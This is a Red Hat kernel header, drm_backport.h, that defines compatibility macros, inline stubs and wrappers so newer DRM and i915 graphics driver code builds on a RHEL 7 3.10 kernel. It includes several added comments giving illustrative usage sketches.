File: /usr/src/kernels/3.10.0-957.10.1.el7.x86_64/include/drm/drm_backport.h
/*
 * Copyright (C) 2013 Red Hat
 *
 * This file is subject to the terms and conditions of the GNU General Public
 * License v2. See the file COPYING in the main directory of this archive for
 * more details.
 */

#ifndef DRM_BACKPORT_H_
#define DRM_BACKPORT_H_

#include <linux/hrtimer.h>
#include <linux/err.h>
#include <linux/io.h>
#include <linux/console.h>
#include <linux/refcount.h>


#include <linux/time64.h>
static inline time64_t ktime_get_real_seconds(void)
{
	return get_seconds();
}

/**
 * ktime_mono_to_real - Convert monotonic time to clock realtime
 */
static inline ktime_t ktime_mono_to_real(ktime_t mono)
{
	return ktime_sub(mono, ktime_get_monotonic_offset());
}

static inline void get_monotonic_boottime64(struct timespec64 *ts)
{
	*ts = ktime_to_timespec64(ktime_get_boottime());
}
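
/*
 * Illustrative sketch (not part of the original header): how a caller might
 * use the time helpers above.  All variable names here are hypothetical.
 *
 *	time64_t wall = ktime_get_real_seconds();
 *	ktime_t real = ktime_mono_to_real(ktime_get());
 *	struct timespec64 boot;
 *
 *	get_monotonic_boottime64(&boot);
 */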

/*
 *
 */

/**
 * list_last_entry - get the last element from a list
 * @ptr:	the list head to take the element from.
 * @type:	the type of the struct this is embedded in.
 * @member:	the name of the list_struct within the struct.
 *
 * Note that the list is expected to be non-empty.
 */
#define list_last_entry(ptr, type, member) \
	list_entry((ptr)->prev, type, member)
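
/*
 * Usage sketch (illustrative; struct foo and foo_list are hypothetical).
 * Per the note above, guard against an empty list before calling:
 *
 *	struct foo { int x; struct list_head node; };
 *	LIST_HEAD(foo_list);
 *
 *	if (!list_empty(&foo_list)) {
 *		struct foo *last =
 *			list_last_entry(&foo_list, struct foo, node);
 *		...
 *	}
 */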


#define module_param_named_unsafe(name, value, type, perm)		\
	module_param_named(name, value, type, perm)
#define module_param_unsafe(name, type, perm)			\
	module_param(name, type, perm)

/*
 *
 */

#include <linux/mm.h>

#define SHRINK_STOP (~0UL)
/*
 * A callback you can register to apply pressure to ageable caches.
 *
 * @count_objects should return the number of freeable items in the cache. If
 * there are no objects to free or the number of freeable items cannot be
 * determined, it should return 0. No deadlock checks should be done during the
 * count callback - the shrinker relies on aggregating scan counts that couldn't
 * be executed due to potential deadlocks to be run at a later call when the
 * deadlock condition is no longer pending.
 *
 * @scan_objects will only be called if @count_objects returned a non-zero
 * value for the number of freeable objects. The callout should scan the cache
 * and attempt to free items from the cache. It should then return the number
 * of objects freed during the scan, or SHRINK_STOP if progress cannot be made
 * due to potential deadlocks. If SHRINK_STOP is returned, then no further
 * attempts to call the @scan_objects will be made from the current reclaim
 * context.
 *
 * @flags determine the shrinker abilities, like numa awareness
 */
struct shrinker2 {
	unsigned long (*count_objects)(struct shrinker2 *,
				       struct shrink_control *sc);
	unsigned long (*scan_objects)(struct shrinker2 *,
				      struct shrink_control *sc);

	int seeks;	/* seeks to recreate an obj */
	long batch;	/* reclaim batch size, 0 = default */
	unsigned long flags;

	/* These are for internal use */
	struct list_head list;
	/* objs pending delete, per node */
	atomic_long_t *nr_deferred;

	/* compat: */
	struct shrinker compat;
};
int register_shrinker2(struct shrinker2 *shrinker);
void unregister_shrinker2(struct shrinker2 *shrinker);

#define shrinker            shrinker2
#define register_shrinker   register_shrinker2
#define unregister_shrinker unregister_shrinker2
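
/*
 * Illustrative sketch (not part of the original header): a minimal shrinker
 * written against the shrinker2 interface.  Thanks to the compat #defines
 * above, it is spelled exactly like the upstream API.  foo_cache_freeable()
 * and foo_cache_trim() are hypothetical driver helpers; a real scan callback
 * would return SHRINK_STOP instead if it could not make progress.
 *
 *	static unsigned long foo_count(struct shrinker *s,
 *				       struct shrink_control *sc)
 *	{
 *		return foo_cache_freeable();
 *	}
 *
 *	static unsigned long foo_scan(struct shrinker *s,
 *				      struct shrink_control *sc)
 *	{
 *		return foo_cache_trim(sc->nr_to_scan);
 *	}
 *
 *	static struct shrinker foo_shrinker = {
 *		.count_objects = foo_count,
 *		.scan_objects  = foo_scan,
 *		.seeks         = DEFAULT_SEEKS,
 *	};
 *
 * Register with register_shrinker(&foo_shrinker) and pair with
 * unregister_shrinker() on teardown.
 */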

/*
 *
 */

extern struct workqueue_struct *system_power_efficient_wq;


/*
 *
 */

#include <linux/rculist.h>

#define cpu_relax_lowlatency() cpu_relax()
#define pagefault_disabled()   in_atomic()

static inline int arch_phys_wc_index(int handle)
{
#ifdef CONFIG_X86
	int phys_wc_to_mtrr_index(int handle);
	return phys_wc_to_mtrr_index(handle);
#else
	return -1;
#endif
}

/*
 * avoiding/emulating 87521e16a7abbf3fa337f56cb4d1e18247f15e8a upstream:
 */

enum acpi_backlight_type {
	acpi_backlight_undef = -1,
	acpi_backlight_none = 0,
	acpi_backlight_video,
	acpi_backlight_vendor,
	acpi_backlight_native,
};

static inline enum acpi_backlight_type acpi_video_get_backlight_type(void)
{
	int acpi_video_backlight_support(void);
#if IS_ENABLED(CONFIG_ACPI_VIDEO)
	bool acpi_video_verify_backlight_support(void);
	if (acpi_video_backlight_support() &&
			!acpi_video_verify_backlight_support())
		return acpi_backlight_native;
#else
	if (acpi_video_backlight_support())
		return acpi_backlight_native;
#endif
	return acpi_backlight_undef;
}

static inline bool apple_gmux_present(void) { return false; }
static inline bool vga_switcheroo_client_probe_defer(struct pci_dev *pdev) { return false; }

/* cmpxchg_relaxed */
#ifndef cmpxchg_relaxed
#define  cmpxchg_relaxed		cmpxchg
#define  cmpxchg_acquire		cmpxchg
#define  cmpxchg_release		cmpxchg
#endif
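
/*
 * Usage sketch (illustrative): on this kernel the relaxed/acquire/release
 * variants above all fall back to the fully ordered cmpxchg(), so code
 * written against the newer names still builds, e.g. a lock-free update
 * loop on a hypothetical counter:
 *
 *	unsigned long old, new;
 *
 *	do {
 *		old = READ_ONCE(counter);
 *		new = old + 1;
 *	} while (cmpxchg_relaxed(&counter, old, new) != old);
 */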

static inline int register_vmap_purge_notifier(struct notifier_block *nb)
{
	return 0;
}

static inline int unregister_vmap_purge_notifier(struct notifier_block *nb)
{
	return 0;
}

enum mutex_trylock_recursive_enum {
	MUTEX_TRYLOCK_FAILED    = 0,
	MUTEX_TRYLOCK_SUCCESS   = 1,
	MUTEX_TRYLOCK_RECURSIVE,
};

static inline bool mutex_is_locked_by(struct mutex *mutex, struct task_struct *task)
{
	if (!mutex_is_locked(mutex))
		return false;

#if defined(CONFIG_SMP) || defined(CONFIG_DEBUG_MUTEXES)
	return mutex->owner == task;
#else
	/* Since UP may be pre-empted, we cannot assume that we own the lock */
	return false;
#endif
}

static inline __deprecated __must_check enum mutex_trylock_recursive_enum
mutex_trylock_recursive(struct mutex *lock)
{
	/* BACKPORT NOTE:
	 * Different from upstream to avoid backporting
	 * 3ca0ff571b092ee4d807f1168caa428d95b0173b, but functionally
	 * equivalent for i915 to previous behavior
	 */
	if (unlikely(mutex_is_locked_by(lock, current)))
		return MUTEX_TRYLOCK_RECURSIVE;

	return mutex_trylock(lock);
}
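
/*
 * Usage sketch (illustrative, mirroring how i915 uses this): callers must
 * handle all three outcomes, and must not unlock on MUTEX_TRYLOCK_RECURSIVE
 * because the current task already holds the lock:
 *
 *	switch (mutex_trylock_recursive(&some_mutex)) {
 *	case MUTEX_TRYLOCK_FAILED:
 *		return -EBUSY;
 *	case MUTEX_TRYLOCK_SUCCESS:
 *		unlock = true;
 *		break;
 *	case MUTEX_TRYLOCK_RECURSIVE:
 *		unlock = false;
 *		break;
 *	}
 */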


/*
 * On x86 PAT systems we have memory tracking that keeps track of
 * the allowed mappings on memory ranges. This tracking works for
 * all the in-kernel mapping APIs (ioremap*), but where the user
 * wishes to map a range from a physical device into user memory
 * the tracking won't be updated. This API is to be used by
 * drivers which remap physical device pages into userspace,
 * and wants to make sure they are mapped WC and not UC.
 *
 * BACKPORT NOTES:  If:
 *
 *   87744ab3832b mm: fix cache mode tracking in vm_insert_mixed()
 *
 * gets backported, then we want to backport:
 *
 *   8ef4227615e1 x86/io: add interface to reserve io memtype for a resource range. (v1.1)
 *
 * and drop these next two stubs
 */
static inline int arch_io_reserve_memtype_wc(resource_size_t base,
					     resource_size_t size)
{
	return 0;
}

static inline void arch_io_free_memtype_wc(resource_size_t base,
					   resource_size_t size)
{
}
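
/*
 * Usage sketch (illustrative): the call pattern these stubs stand in for.
 * Once the upstream commits noted above are backported, the same driver
 * code picks up real PAT memtype reservation; here both calls are no-ops.
 *
 *	if (arch_io_reserve_memtype_wc(base, size))
 *		return -EINVAL;
 *	vaddr = ioremap_wc(base, size);
 *	...
 *	iounmap(vaddr);
 *	arch_io_free_memtype_wc(base, size);
 */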


static inline int __must_check down_write_killable(struct rw_semaphore *sem)
{
	down_write(sem);
	return 0;
}


static inline long __drm_get_user_pages(struct task_struct *tsk, struct mm_struct *mm,
		unsigned long start, unsigned long nr_pages, int write,
		int force, struct page **pages, struct vm_area_struct **vmas)
{
	return get_user_pages(tsk, mm, start, nr_pages, write, force, pages, vmas);
}

#define get_user_pages_remote(c, mm, start, nr_pages, write, pages, vmas, locked) \
		__drm_get_user_pages(c, mm, start, nr_pages, write, 0, pages, vmas)
#define get_user_pages(start, nr_pages, write, pages, vmas) \
	__drm_get_user_pages(current, current->mm, start, nr_pages, write, 0, pages, vmas)
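
/*
 * Usage sketch (illustrative): with the wrappers above, callers written
 * against the newer calling conventions work on this kernel, e.g. pinning
 * npages writable pages starting at start (mmap_sem held for read):
 *
 *	down_read(&current->mm->mmap_sem);
 *	pinned = get_user_pages(start, npages, 1, pages, NULL);
 *	up_read(&current->mm->mmap_sem);
 *	if (pinned < npages)
 *		...
 */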


#define smp_store_mb(var, value)	set_mb(var, value)

#ifndef atomic_set_release
#define  atomic_set_release(v, i)	smp_store_release(&(v)->counter, (i))
#endif

#ifdef CONFIG_X86
#ifndef atomic_andnot
static inline void atomic_andnot(int i, atomic_t *v)
{
	atomic_and(~i, v);
}
#endif
#endif

/* drm_panel stubs to make i915 happy.  We don't support any hardware
 * using DSI, and without some work the panel code would be unhappy on
 * Power or anything else with CONFIG_OF.
 */
struct drm_panel;
struct drm_connector;
static inline void drm_panel_init(struct drm_panel *panel) {}
static inline int drm_panel_attach(struct drm_panel *panel, struct drm_connector *connector)
{
	return -ENXIO;
}
static inline int drm_panel_detach(struct drm_panel *panel)
{
	return 0;
}
static inline int drm_panel_add(struct drm_panel *panel)
{
	return -ENXIO;
}
static inline void drm_panel_remove(struct drm_panel *panel) {}

typedef wait_queue_t wait_queue_entry_t;
#define __add_wait_queue_entry_tail __add_wait_queue_tail

unsigned int swiotlb_max_size(void);
#define swiotlb_max_segment swiotlb_max_size

#define SLAB_TYPESAFE_BY_RCU SLAB_DESTROY_BY_RCU

#include <linux/fs.h>

static inline int call_mmap(struct file *file, struct vm_area_struct *vma)
{
	return file->f_op->mmap(file, vma);
}

static inline void mmgrab(struct mm_struct *mm)
{
	atomic_inc(&mm->mm_count);
}

/*
 * Since we just use get_user()/put_user() for unsafe_put_user()
 * and unsafe_get_user(), these can be no-ops.
 */
#define user_access_begin() do {} while (0)
#define user_access_end()   do {} while (0)

#define unsafe_put_user(x, ptr, err_label)	\
do {						\
	int __pu_err = put_user(x, ptr);	\
	if (unlikely(__pu_err)) goto err_label;	\
} while (0)

#define unsafe_get_user(x, ptr, err_label)	\
do {						\
	int __gu_err = get_user(x, ptr);	\
	if (unlikely(__gu_err)) goto err_label;	\
} while (0)
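
/*
 * Usage sketch (illustrative): the unsafe_*_user() macros jump to a
 * caller-supplied label on fault.  Since user_access_begin()/end() are
 * no-ops here, the sequence degenerates to plain get_user()/put_user():
 *
 *	user_access_begin();
 *	unsafe_get_user(val, uptr, efault);
 *	unsafe_put_user(val + 1, uptr, efault);
 *	user_access_end();
 *	return 0;
 * efault:
 *	user_access_end();
 *	return -EFAULT;
 */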

/*
 * We don't have the commits in the rhel7 kernel which necessitate
 * this flag, so it is just zero.  Define it as an enum so if someone
 * does backport the pci/pm patches, it won't go unnoticed that this
 * needs to be removed.  See bac2a909a096c9110525c18cbb8ce73c660d5f71
 * and 4d071c3238987325b9e50e33051a40d1cce311cc upstream.
 */
enum {
	PCI_DEV_FLAGS_NEEDS_RESUME = 0,
};

#define get_random_u32() ((u32)get_random_int())
#define dev_pm_set_driver_flags(...) do { } while (0)
#define __GFP_RETRY_MAYFAIL __GFP_REPEAT

/* TODO partial backport of a55bbd375d1802141f0f043e2cd08f85c23d6209 */
#define idr_for_each_entry_continue(idp, entry, id)			\
	for ((entry) = idr_get_next((idp), &(id));			\
	     entry;							\
	     ++id, (entry) = idr_get_next((idp), &(id)))
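
/*
 * Usage sketch (illustrative): resume an IDR walk at or after a saved id,
 * e.g. after dropping a lock mid-iteration (foo_idr is hypothetical):
 *
 *	struct foo *entry;
 *	int id = saved_id;
 *
 *	idr_for_each_entry_continue(&foo_idr, entry, id) {
 *		...
 *	}
 */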

/* until 8eb8284b412906181357c2b0110d879d5af95e52 is backported: */
#define kmem_cache_create_usercopy(n, s, a, f, uo, us, c) \
	kmem_cache_create(n, s, a, f, c)
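
/*
 * Usage sketch (illustrative): callers keep the newer seven-argument
 * signature; on this kernel the usercopy offset/size are simply dropped:
 *
 *	cache = kmem_cache_create_usercopy("foo_cache",
 *			sizeof(struct foo), 0, SLAB_HWCACHE_ALIGN,
 *			offsetof(struct foo, data),
 *			FIELD_SIZEOF(struct foo, data), NULL);
 */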

int __init drm_backport_init(void);
void __exit drm_backport_exit(void);

#undef pr_fmt

#endif /* DRM_BACKPORT_H_ */
